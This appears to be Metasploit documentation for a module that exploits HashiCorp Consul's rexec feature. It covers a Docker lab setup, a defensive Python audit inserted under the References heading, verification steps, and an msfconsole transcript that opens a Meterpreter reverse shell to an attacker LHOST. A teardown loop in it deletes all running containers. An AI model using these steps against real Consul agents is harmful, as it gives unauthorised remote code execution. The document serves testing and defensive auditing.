metasploit-gs/documentation/modules/exploit/multi/misc/consul_rexec_exec.md
2018-08-10 22:47:18 +02:00
## Vulnerable Application

### Description

This module exploits a feature of HashiCorp Consul named rexec.

The `exec` command provides a mechanism for remote execution. For example, it can be used to run the `uptime` command across all machines providing the `web` service.

Whether the rexec service is exposed depends on the `disable_remote_exec` option. Starting with Consul 0.8 this option defaults to `true`, making remote exec opt-in instead of opt-out.

### References
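The two facts above (the 0.8 default change and the `disable_remote_exec` setting) are what an operator needs to decide whether an agent is exposed. The following is an added example, not part of this module documentation, that turns them into an audit: it parses the `consul members` table shown later on this page to flag agents whose build predates 0.8, and reads the effective `DisableRemoteExec` value from an agent's `/v1/agent/self` response. The JSON document below is constructed and trimmed to the keys that are read; the placement of `DisableRemoteExec` under `DebugConfig` is assumed from Consul's runtime configuration output and should be checked against the version you run.

```python
"""Audit Consul agents for remote-exec exposure (added example, not module code)."""
import json
import re

# Constructed sample: the `consul members` output from the test setup on this page.
MEMBERS_OUTPUT = """\
Node          Address          Status  Type    Build  Protocol  DC   Segment
23e8aa468784  172.17.0.1:8301  alive   server  1.0.6  2         dc1  <all>
7c53a6f48642  172.17.0.3:8301  alive   server  1.0.6  2         dc1  <all>
b28c7929c2a2  172.17.0.2:8301  alive   server  1.0.6  2         dc1  <all>
a58ec109f450  172.17.0.4:8301  alive   client  1.0.6  2         dc1  <default>
"""

# Constructed sample: a trimmed /v1/agent/self document for the client agent that the
# test script launches with "disable_remote_exec": false. Real responses carry many
# more keys; only those read below matter here. The DebugConfig location of
# DisableRemoteExec is an assumption about Consul's runtime config dump.
AGENT_SELF_JSON = json.dumps({
    "Config": {"Datacenter": "dc1", "NodeName": "a58ec109f450",
               "Server": False, "Version": "1.0.6"},
    "DebugConfig": {"DisableRemoteExec": False, "EnableUI": True},
})

# disable_remote_exec defaults to true from Consul 0.8 onwards.
REMOTE_EXEC_OPT_IN_SINCE = (0, 8)


def parse_version(build):
    """'1.0.6' -> (1, 0, 6); any '+suffix' (e.g. enterprise builds) is ignored."""
    core = build.split("+")[0]
    return tuple(int(p) for p in core.split("."))


def remote_exec_enabled_by_default(build):
    """True when this build still shipped with remote exec enabled (pre-0.8)."""
    return parse_version(build) < REMOTE_EXEC_OPT_IN_SINCE


def parse_members(text):
    """Split the whitespace-aligned `consul members` table into one dict per row."""
    lines = [line for line in text.splitlines() if line.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    return [dict(zip(header, re.split(r"\s{2,}", line.strip()))) for line in lines[1:]]


def audit_members(text):
    """Return {node: reason} for agents whose version alone makes rexec a default-on risk."""
    findings = {}
    for row in parse_members(text):
        if remote_exec_enabled_by_default(row["Build"]):
            findings[row["Node"]] = (
                "build %s predates 0.8: remote exec is on unless "
                "disable_remote_exec was set explicitly" % row["Build"])
    return findings


def audit_agent_self(raw_json):
    """Return (node_name, remote_exec_enabled) from a /v1/agent/self response.

    The effective DisableRemoteExec flag is read from DebugConfig when present;
    otherwise the decision falls back to the version default.
    """
    doc = json.loads(raw_json)
    node = doc["Config"]["NodeName"]
    debug = doc.get("DebugConfig", {})
    if "DisableRemoteExec" in debug:
        return node, not debug["DisableRemoteExec"]
    return node, remote_exec_enabled_by_default(doc["Config"]["Version"])


if __name__ == "__main__":
    for node, reason in audit_members(MEMBERS_OUTPUT).items():
        print("[!] %s: %s" % (node, reason))
    node, enabled = audit_agent_self(AGENT_SELF_JSON)
    print("[%s] %s: remote exec %s" % ("!" if enabled else "+", node,
                                       "ENABLED" if enabled else "disabled"))
```

Against the sample cluster the version check is clean (every agent is 1.0.6), while the client agent's own configuration reports remote exec enabled, which is exactly the condition the module's `check` looks for. For a live audit, feed `audit_agent_self` the body of an HTTP GET to `http://<agent>:8500/v1/agent/self` for each agent listed by `consul members`; disabling the feature means setting `disable_remote_exec` to `true` in every agent's configuration, not only on the servers.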

## Test setup

The following shell script can be used to set up a testing environment with Docker:

```sh
#!/bin/sh

echo "[+] Launching consul instances..."
# Bootstrap server: the first server, allowed to elect itself leader.
docker run -d --name=consul_bootstrap_server consul agent -server -client=172.17.0.1 -bootstrap -data-dir /tmp/consul
sleep 2

# Two more servers, each joined to the bootstrap server through its HTTP API.
docker run -d --name=consul_server_1 consul agent -server -client=172.17.0.2 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.2

docker run -d --name=consul_server_2 consul agent -server -client=172.17.0.3 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.3

# Client agent with remote exec explicitly enabled; this is the module's target.
docker run -d -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "disable_remote_exec":false}' consul agent -ui -client=172.17.0.4 -retry-join=172.17.0.1

sleep 4
echo "[+] Checking members..."
docker exec -t consul_bootstrap_server consul members -http-addr="172.17.0.1:8500"
```

You should observe something similar to the excerpt below when running the script:

```
sudo ./launch.sh
[+] Launching consul instances...
23e8aa4687846382e601ec3c5a66d6db9448518647996f8fd8fdbcdde7f612cf
b28c7929c2a2141c162a35d635af48fdafd70f6c03bee61445e7e78f4e76af84
Successfully joined cluster by contacting 1 nodes.
7c53a6f486426ad6ab4886f3f7b85481932333850d0046280ca082ff1bb79358
Successfully joined cluster by contacting 1 nodes.
a58ec109f45029352a94721ee2e7c9c80a9c94178af8efd15279951da8ed0cab
[+] Checking members...
Node          Address          Status  Type    Build  Protocol  DC   Segment
23e8aa468784  172.17.0.1:8301  alive   server  1.0.6  2         dc1  <all>
7c53a6f48642  172.17.0.3:8301  alive   server  1.0.6  2         dc1  <all>
b28c7929c2a2  172.17.0.2:8301  alive   server  1.0.6  2         dc1  <all>
a58ec109f450  172.17.0.4:8301  alive   client  1.0.6  2         dc1  <default>
```

The following shell script can be used to stop and destroy all of your running Docker containers (so be careful if you use Docker containers for other things at the same time):

```sh
#!/bin/sh
# Stops and removes every running container, not only the Consul ones.
for h in $(sudo docker ps | grep -v CONTAINER | cut -d' ' -f1); do sudo docker stop "$h" && sudo docker rm "$h"; done
```

## Verification Steps

You can verify the module against the vulnerable application with these steps:

  1. Launch a Consul cluster with the provided shell script
  2. Start `msfconsole`
  3. Do: `use exploit/multi/misc/consul_rexec_exec`
  4. Do: `set RHOST 172.17.0.4`
  5. Do: `set RPORT 8500`
  6. Do: `check`. The target should appear vulnerable.
  7. Do: `set payload` with the payload of your choosing.
  8. Do: `set LHOST 172.17.42.1` (docker0 gateway IP)
  9. Do: `run`
  10. You should get a shell.

## Scenarios

### Reverse shell on Linux host

Exploit running against a Docker Consul container target:

```
msf5 > use exploit/multi/misc/consul_rexec_exec
msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4
RHOSTS => 172.17.0.4
msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1
LHOST => 172.17.42.1
msf5 exploit(multi/misc/consul_rexec_exec) > check
[+] 172.17.0.4:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_rexec_exec) > run

[*] Started reverse TCP handler on 172.17.42.1:4444
[*] Creating session.
[*] Got rexec session ID b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Setting command for rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Triggering execution on rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Sending stage (861480 bytes) to 172.17.0.4
[*] Cleaning up rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Command Stager progress - 115.73% done (883/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.4
OS           :  (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.17.0.4 - Meterpreter session 1 closed.  Reason: User exit
```